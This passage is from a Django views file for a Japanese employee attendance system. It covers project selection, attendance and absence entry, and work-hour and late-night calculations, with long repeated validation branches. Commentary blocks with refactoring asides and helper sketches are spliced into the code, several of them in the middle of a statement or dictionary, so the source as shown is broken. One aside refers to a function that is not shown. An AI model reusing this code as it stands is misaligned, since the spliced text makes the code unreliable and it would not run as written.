float(l.resttime)\n \n sumwork = round(sumwork,2)\n overwork = round(overwork,2)\n resttime = round(resttime,2)\n context = {\n 'monthselect' : monthyear,\n 'listaaaa': listmmm,\n 'sumwork': sumwork,\n 'overwork': overwork,\n 'resttime': resttime,\n }\n return render(request, 'registration/output_ichiran.html', context)\n \n\ndef project(request):\n template = loader.get_template('registration/projecttouroku.html')\n list = project_work.objects.all().distinct('projectname')\n projectselect1 = request.session.get('project1', '')\n projectselect2 = request.session.get('project2', '')\n projectselect3 = request.session.get('project3', '')\n projectselect4 = request.session.get('project4', '')\n request.session['abs'] = request.POST.get('absproject', '')\n request.session['chikoku'] = request.POST.get('chikokuproject', '')\n request.session['hayade'] = request.POST.get('hayadeproject', '')\n request.session['soutai'] = request.POST.get('soutaiproject', '')\n request.session['hensoku'] = request.POST.get('hensokuproject', '')\n request.session['midnight'] = 
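# ---- Aside (re: output2 above): the month view builds one slot per calendar day,
# then overlays whatever kintai_touroku_info rows exist, leaving a bare date where
# nothing was recorded. The merge in isolation, assuming rows carry a .ymd date as
# the model does:
import calendar
import datetime

def month_slots(year, month, rows):
    days_in_month = calendar.monthrange(year, month)[1]
    slots = [datetime.date(year, month, day) for day in range(1, days_in_month + 1)]
    for row in rows:
        slots[row.ymd.day - 1] = row  # recorded days replace the bare date
    return slots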
request.POST.get('midnightproject', '')\n request.session['holiday'] = request.POST.get('holidayproject', '')\n request.session['holidaykbn'] = request.POST.get('holidaykbnproject', '')\n request.session['riyu'] = request.POST.get('riyuproject', '')\n request.session['starttime'] = request.POST.get('starttime', '')\n request.session['endtime'] = request.POST.get('endtime', '')\n request.session['overtime'] = request.POST.get('overtime', '')\n cont = {\n 'pro': list,\n 'projectselect1': projectselect1,\n 'projectselect2': projectselect2,\n 'projectselect3': projectselect3,\n 'projectselect4': projectselect4,\n }\n return render(request, 'registration/projecttouroku.html', context=cont)\n \n# 出欠選択画面\ndef kintaiabs(request):\n template = loader.get_template('registration/kintai.html')\n request.session['Absentkbn'] = request.POST['Absentkbn']\n abskbn = \"\"\n \n kbn = request.POST.get('holidaykbn', '')\n abs = request.POST.get('Absentkbn', '')\n if (abs == '0'):\n abskbn = \"出勤\"\n if (abs == '1'):\n abskbn = \"欠勤\"\n \n context = {}\n if(abs == ''):\n context.update({\n 'riyuerror': '出欠区分を選択してください',\n })\n return render(request, 'registration/syukketsusentaku.html', context)\n \n\n riyu = request.POST.get('riyu', '')\n \n chikoku = request.POST['Todokede0']\n hayade = request.POST['Todokede1']\n soutai = request.POST['Todokede2']\n hensoku = request.POST['Todokede3']\n midnight = request.POST['Todokede4']\n holiday = request.POST['Todokede5']\n \n\n value1 = project_work.objects.filter(projectname=request.session.get('touroku1', '')).distinct('kouteiname')\n value2 = project_work.objects.filter(projectname=request.session.get('touroku2', '')).distinct('kouteiname')\n value3 = project_work.objects.filter(projectname=request.session.get('touroku3', '')).distinct('kouteiname')\n if(abs == '1' and (kbn == '' or riyu == '')):\n if(kbn == ''):\n context.update({\n 'holierror': '休暇区分を選択してください',\n })\n if(riyu == ''):\n context.update({\n 'riyuerror': '休暇理由を選択してください',\n })\n return render(request, 'registration/syukketsusentaku.html', context)\n kanmaflg = False\n \n if(chikoku != ''):\n kanmaflg = True\n if(hayade != ''):\n if kanmaflg:\n hayade = ',早出有'\n else:\n hayade = '早出有' \n kanmaflg = True\n \n if(soutai != ''):\n if kanmaflg:\n soutai = ',早退'\n else:\n soutai = '早退' \n kanmaflg = True\n \n if(hensoku != ''):\n if kanmaflg:\n hensoku = ',変則勤務'\n else:\n hensoku = '変則勤務' \n kanmaflg = True\n \n if(midnight!= ''):\n if kanmaflg:\n midnight= ',深夜有'\n else:\n midnight= '深夜有' \n kanmaflg = True\n \n if(holiday!= ''):\n if kanmaflg:\n holiday= ',休日出勤'\n else:\n holiday= '休日出勤' \n kanmaflg = True\n\n context = {\n 'ymd': request.session.get('dateselect', ''),\n 'starttime': request.session.get('starttime', ''),\n 'endtime': request.session.get('endtime', ''),\n 'overtime': request.session.get('overtime', ''),\n 'projectname1': request.session.get('touroku1', ''),\n 'projectname2': request.session.get('touroku2', ''),\n 'projectname3': request.session.get('touroku3', ''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'abs' : abskbn,\n 'chikoku' : chikoku,\n 'hayade' : hayade,\n 'soutai' : soutai,\n 'hensoku' : hensoku,\n 'midnight': midnight,\n 'holiday' : holiday,\n }\n return render(request, 'registration/kintai.html', context)\n\n \ndef kintaiproject(request):\n template = loader.get_template('registration/kintai.html')\n dateselect = request.session.get('dateselect', '')\n abs = request.session.get('abs', '')\n hol = request.session.get('holidaykbn','')\n riyu = 
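# ---- Aside: both output2 and kintaiabs above thread a kanmaflg through long
# if-chains purely to decide where the commas go. Collecting the set flags and
# joining once produces the same strings:
def join_flags(flags):
    """flags: iterable of (is_set, label) pairs in display order."""
    return ','.join(label for is_set, label in flags if is_set)

# join_flags([(1, '遅刻'), (0, '早退'), (1, '深夜')]) == '遅刻,深夜'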
request.session.get('riyu','')\n todo0 = request.session.get('chikoku','')\n todo1 = request.session.get('hayade','')\n todo2 = request.session.get('soutai','')\n todo3 = request.session.get('hensoku','')\n todo4 = request.session.get('midnight','')\n todo5 = request.session.get('holiday','')\n ida = request.session.get('User','')\n \n value = project_work.objects.all().distinct('workname')\n value1 = project_work.objects.filter(projectname=request.POST['touroku1']).distinct('kouteiname')\n value2 = project_work.objects.filter(projectname=request.POST['touroku2']).distinct('kouteiname')\n value3 = project_work.objects.filter(projectname=request.POST['touroku3']).distinct('kouteiname')\n value4 = project_work.objects.filter(projectname=request.POST['touroku4']).distinct('kouteiname') \n \n touroku1 = request.POST['touroku1']\n touroku2 = request.POST['touroku2']\n touroku3 = request.POST['touroku3']\n touroku4 = request.POST['touroku4']\n print(\"touroku1 \" + touroku1)\n request.session['touroku1'] = request.POST['touroku1']\n request.session['touroku2'] = request.POST['touroku2']\n request.session['touroku3'] = request.POST['touroku3']\n request.session['touroku4'] = request.POST['touroku4']\n if request.method == 'POST':\n context = {\n 'ymd': dateselect,\n 'starttime': request.session.get('starttime', ''),\n 'endtime': request.session.get('endtime', ''),\n 'overtime': request.session.get('overtime', ''),\n 'projectname1': touroku1,\n 'projectname2': touroku2,\n 'projectname3': touroku3,\n 'projectname4': touroku4,\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'abs': abs,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'user' : ida,\n }\n return render(request, 'registration/kintai.html', context)\n return HttpResponse(template.render( None, request))\n \n#勤怠登録押下、工程選択時 \ndef kintaitouroku(request):\n template = loader.get_template('registration/kintai.html')\n btt = request.POST.get('btnExecH','')\n abs = request.POST.get('abs','')\n nowyear = str(datetime.date.today().year)\n nowmonth = str(format(datetime.date.today().month,'02'))\n nowday = str(format(datetime.date.today().day,'02'))\n nowdate = nowyear + \"-\" + nowmonth + \"-\" + nowday\n timestr = request.POST.get('dateselect',nowdate)\n \n ida = request.session.get('User','')\n listf = kintai_touroku_info.objects.filter(ymd = timestr,syaincd = ida)\n errflg = False\n context = {} \n syainname = syain_info.objects.all() \n start = request.POST.get('starttime', '')\n end = request.POST.get('endtime', '')\n over = request.POST.get('overtime', '')\n\n tourokuope = request.POST.get('tourokuope','')\n if(tourokuope != ''):\n t1 = request.POST.get('project1','')\n t2 = request.POST.get('project2','')\n t3 = request.POST.get('project3','')\n t4 = request.POST.get('project4','')\n request.session['project1'] = request.POST.get('project1','')\n request.session['project2'] = request.POST.get('project2','')\n request.session['project3'] = request.POST.get('project3','')\n request.session['project4'] = request.POST.get('project4','')\n else:\n t1 = request.POST.get('projectname1','')\n t2 = request.POST.get('projectname2','')\n t3 = request.POST.get('projectname3','')\n t4 = request.POST.get('projectname4','')\n \n pcd1 = project_work.objects.filter(projectname = t1)\n pcd2 = project_work.objects.filter(projectname = t2)\n pcd3 = project_work.objects.filter(projectname = t3)\n pcd4 = 
project_work.objects.filter(projectname = t4)\n \n if (len(pcd1) != 0):\n projectcd1 = pcd1[0].projectcd\n else:\n projectcd1 = \"\"\n print(\"projectcd1\" + projectcd1)\n \n if (len(pcd2) != 0):\n projectcd2 = pcd2[0].projectcd\n else:\n projectcd2 = \"\"\n print(\"projectcd2\" + projectcd2)\n \n if (len(pcd3) != 0):\n projectcd3 = pcd3[0].projectcd\n else:\n projectcd3 = \"\"\n print(\"projectcd3\" + projectcd3)\n \n if (len(pcd4) != 0):\n projectcd4 = pcd4[0].projectcd\n else:\n projectcd4 = \"\"\n print(\"projectcd4\" + projectcd4)\n\n koutei1 = request.POST.get('kouteiname1','')\n koutei2 = request.POST.get('kouteiname2','')\n koutei3 = request.POST.get('kouteiname3','')\n koutei4 = request.POST.get('kouteiname4','')\n kcd1 = project_work.objects.filter(kouteiname = koutei1)\n kcd2 = project_work.objects.filter(kouteiname = koutei2)\n kcd3 = project_work.objects.filter(kouteiname = koutei3)\n kcd4 = project_work.objects.filter(kouteiname = koutei4)\n if (len(kcd1) != 0):\n kouteicd1 = kcd1[0].kouteicd\n else:\n kouteicd1 = \"\"\n \n if (len(kcd2) != 0):\n kouteicd2 = kcd2[0].kouteicd\n else:\n kouteicd2 = \"\"\n \n if (len(kcd3) != 0):\n kouteicd3 = kcd3[0].kouteicd\n else:\n kouteicd3 = \"\"\n \n if (len(kcd4) != 0):\n kouteicd4 = kcd4[0].kouteicd\n else:\n kouteicd4 = \"\"\n \n gyomuselect1 = request.POST.get('workname1','')\n gyomuselect2 = request.POST.get('workname2','')\n gyomuselect3 = request.POST.get('workname3','')\n gyomuselect4 = request.POST.get('workname4','')\n gcd1 = project_work.objects.filter(workname = gyomuselect1)\n gcd2 = project_work.objects.filter(workname = gyomuselect2)\n gcd3 = project_work.objects.filter(workname = gyomuselect3)\n gcd4 = project_work.objects.filter(workname = gyomuselect4)\n \n if (len(gcd1) != 0):\n workcd1 = gcd1[0].workcd\n else:\n workcd1 = \"\"\n print(\"workcd1\" + workcd1)\n \n if (len(gcd2) != 0):\n workcd2 = gcd2[0].workcd\n else:\n workcd2 = \"\"\n print(\"workcd2\" + workcd2)\n \n if (len(gcd3) != 0):\n workcd3 = gcd3[0].workcd\n else:\n workcd3 = \"\"\n print(\"workcd3\" + workcd3)\n \n if (len(gcd4) != 0):\n workcd4 = gcd4[0].workcd\n else:\n workcd4 = \"\"\n print(\"workcd4\" + workcd4)\n \n value1 = project_work.objects.filter(projectname=t1).distinct('kouteiname')\n value2 = project_work.objects.filter(projectname=t2).distinct('kouteiname')\n value3 = project_work.objects.filter(projectname=t3).distinct('kouteiname')\n value4 = project_work.objects.filter(projectname=t4).distinct('kouteiname')\n gyomu1 = project_work.objects.filter(projectname=t1,kouteiname=koutei1)\n gyomu2 = project_work.objects.filter(projectname=t2,kouteiname=koutei2)\n gyomu3 = project_work.objects.filter(projectname=t3,kouteiname=koutei3)\n gyomu4 = project_work.objects.filter(projectname=t4,kouteiname=koutei4)\n \n starttime1 = request.POST.get('starttime1','00:00')\n starttime2 = request.POST.get('starttime2','00:00')\n starttime3 = request.POST.get('starttime3','00:00')\n starttime4 = request.POST.get('starttime4','00:00')\n endtime1 = request.POST.get('endtime1','00:00')\n endtime2 = request.POST.get('endtime2','00:00')\n endtime3 = request.POST.get('endtime3','00:00')\n endtime4 = request.POST.get('endtime4','00:00')\n resttime1 = request.POST.get('resttime1','0')\n resttime2 = request.POST.get('resttime2','0')\n resttime3 = request.POST.get('resttime3','0')\n resttime4 = request.POST.get('resttime4','0')\n\n hol = request.POST.get('holidaykbn','')\n riyu = request.POST.get('riyu','')\n todo0 = request.POST.get('chikoku','')\n todo1 = 
request.POST.get('hayade','')\n todo2 = request.POST.get('soutai','')\n todo3 = request.POST.get('hensoku','')\n todo4 = request.POST.get('midnight','')\n todo5 = request.POST.get('holiday','')\n\n if(btt != '勤怠登録'):\n\n if (abs == '欠勤'):\n context = {\n 'ymd': timestr,\n 'abs': abs,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'holidaykbn': hol,\n 'riyu' : riyu, \n 'user' : ida,\n }\n return render(request, 'registration/kintai.html', context)\n\n request.session['kouteiname1'] = request.POST.get('kouteiname1','')\n request.session['kouteiname2'] = request.POST.get('kouteiname2','')\n request.session['kouteiname3'] = request.POST.get('kouteiname3','')\n request.session['kouteiname4'] = request.POST.get('kouteiname4','')\n context = {\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'ymd': timestr,\n 'abs': abs,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'holidaykbn': hol,\n 'riyu' : riyu, \n 'user' : ida,\n }\n return render(request, 'registration/kintai.html', context)\n\n name = syain_info.objects.get(syaincd=ida).syainname\n worktime = 0.0\n rest = 0.0\n holdb = 0\n todok = 0\n if(hol == \"取得なし\"):\n holdb = 0\n \n if(hol == \"有給休暇\"):\n holdb = 1\n\n if(hol == \"特休・その他休暇\"):\n holdb = 2\n\n if(hol == \"代休\"):\n holdb = 3\n \n if(hol == \"その他\"):\n holdb = 4\n \n if(hol == \"半休等\"):\n holdb = 5\n \n if(abs == '出勤'):\n absdb = 0\n if(abs == '欠勤'):\n absdb = 1\n \n\n\n if(abs == '出勤' or abs == ''):\n \n if (resttime1 == ''):\n resttime1 = 0\n if (resttime2 == ''):\n resttime2 = 0\n if (resttime3 == ''):\n resttime3 = 0\n if (resttime4 == ''):\n resttime4 = 0\n resttime = float(resttime1) + float(resttime2) + float(resttime3) + float(resttime4)\n midtime = 0\n midover = 0\n paidtime = 0\n morningtime = 0\n \n if( abs == '' ):\n context.update({\n 'absnerror': '出欠選択されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': 
request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n\n })\n print('abserror')\n errflg = True\n\n if(t1 == '' and t2 == '' and t3 == '' and t4 == ''):\n context.update({\n 'projecterror': 'プロジェクト登録をしてください',\n 'ymd': timestr,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'user' : ida,\n })\n errflg = True\n \n if( (t1 != '' and starttime1 == '') or (t2 != '' and starttime2 == '') or (t3 != '' and starttime3 == '') or (t4 != '' and starttime4 == '') ):\n context.update({\n 'starterror': '開始時刻が入力されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n })\n print('starterror')\n errflg = True\n if( (t1 != '' and endtime1 == '') or (t2 != '' and endtime2 == '') or (t3 != '' and endtime3 == '') or (t4 != '' and endtime4 == '') ):\n context.update({\n 'enderror': '終了時刻が入力されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': 
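# ---- Aside: every validation branch in kintaitouroku rebuilds a near-identical
# context dict by hand. Factoring the POST echo into one helper removes most of
# that duplication; the key names below match the POST fields used above:
def echo_post_fields(request, extra=None):
    keys = ['starttime', 'endtime', 'overtime']
    keys += [f'{name}{i}' for i in range(1, 5)
             for name in ('starttime', 'endtime', 'resttime')]
    context = {key: request.POST.get(key, '') for key in keys}
    context.update(extra or {})  # e.g. {'starterror': '開始時刻が入力されていません'}
    return context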
request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n })\n print('enderror')\n errflg = True\n \n\n if( (t1 != '' and koutei1 == '') or (t2 != '' and koutei2 == '') or (t3 != '' and koutei3 == '') or (t4 != '' and koutei4 == '')):\n context.update({\n 'kouteierror': '工程が入力されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu, \n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n\n })\n errflg = True\n if( (t1 != '' and gyomuselect1 == '') or (t2 != '' and gyomuselect2 == '') or (t3 != '' and gyomuselect3 == '') or (t4 != '' and gyomuselect4 == '')):\n context.update({\n 'workerror': '業務が入力されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 
'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n\n })\n print('workerror')\n errflg = True\n if( timestr == ''):\n context.update({\n 'timeerror': '日付が入力されていません',\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n\n })\n errflg = True\n if (todo0 == ''):\n todo0db = 0\n else:\n todo0db = 1\n \n if (todo1 == ''):\n todo1db = 0\n else:\n todo1db = 1\n \n if (todo2 == ''):\n todo2db = 0\n else:\n todo2db = 1\n\n if (todo3 == ''):\n todo3db = 0\n else:\n todo3db = 1\n \n if (todo4 == ''):\n todo4db = 0\n else:\n todo4db = 1\n \n if (todo5 == ''):\n todo5db = 0\n else:\n todo5db = 1\n\n if(todo0db == 1 or todo1db == 1 or todo2db == 1 or todo3db == 1 or todo4db == 1 or todo5db == 1 ):\n todok = 1\n if errflg:\n return render(request, 'registration/kintai.html', context)\n \n startn = start.split(':')\n endn = end.split(':')\n starth = int(startn[0])\n endh = int(endn[0])\n if(starth >= endh):\n endh = endh + 24\n startm = int(startn[1])\n endm = int(endn[1])\n min = endm - startm\n min = min / 60\n \n worktime = endh - starth + min - float(resttime)\n worktime = round(worktime,2)\n if (worktime < 7.5):\n paidtime = math.ceil(7.5 - worktime)\n \n if (starth <= 8 and starth >= 5 and (endh >= 9 or endh <= 4)):\n morningtime = 9 - starth - startm / 60\n if(starth <= 8 and starth >= 5 and (endh < 9 or endh > 4)):\n morningtime = worktime\n \n if(startm > endm):\n worktime = worktime - 1\n if (endh >= 22 or endh <= 5 or starth >= 22 or starth <= 5):\n \n if (starth < 22 and starth > 5):\n if (endh >= 22):\n midtime = endh - 22 + endm / 60\n if (endh <= 5):\n midtime = endh + 2 + endm / 60\n else:\n if (starth >= 22 or starth <= 5):\n if ( endh <= 5 and starth < 22):\n midtime = endh - starth + min\n if ( endh <= 5 and starth >= 22):\n midtime = endh + 24 - starth - min\n if ( end > 5 and start < 22):\n midtime = 5 - starth - min\n if ( end > 5 and start >= 22):\n midtime = 24 - starth + 4 - startm / 60\n if (worktime > 7.5):\n midover = midtime\n \n if (todo4 == ''):\n 
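# ---- Aside (re: the worktime arithmetic above): the view splits 'HH:MM' strings,
# adds 24 hours when a shift crosses midnight, and subtracts rest. One defect to
# note: paidtime is computed with math.ceil, but views.py never imports math, so
# that branch raises NameError at runtime; `import math` belongs at the top of the
# module. The core calculation in isolation, as a sketch:
import math

def hours_worked(start, end, rest_hours):
    sh, sm = map(int, start.split(':'))
    eh, em = map(int, end.split(':'))
    if (eh, em) <= (sh, sm):  # crossed midnight
        eh += 24
    return round((eh + em / 60) - (sh + sm / 60) - rest_hours, 2)

def paid_shortfall(worked, standard=7.5):
    return math.ceil(standard - worked) if worked < standard else 0

# hours_worked('22:30', '07:00', 1.0) == 7.5, and paid_shortfall(7.5) == 0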
context.update({\n 'miderror': '深夜有が選択されていません',\n 'starttime': start,\n 'endtime': end,\n 'overtime': over,\n 'projectname1': t1,\n 'projectname2': t2,\n 'projectname3': t3,\n 'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),\n 'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),\n 'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),\n 'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),\n 'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''),\n 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''),\n 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,\n 'koutei2': value2,\n 'koutei3': value3,\n 'koutei4': value4,\n 'kouteiselect1': koutei1,\n 'kouteiselect2': koutei2,\n 'kouteiselect3': koutei3,\n 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,\n 'gyomu2': gyomu2,\n 'gyomu3': gyomu3,\n 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,\n 'gyomuselect2': gyomuselect2,\n 'gyomuselect3': gyomuselect3,\n 'gyomuselect4': 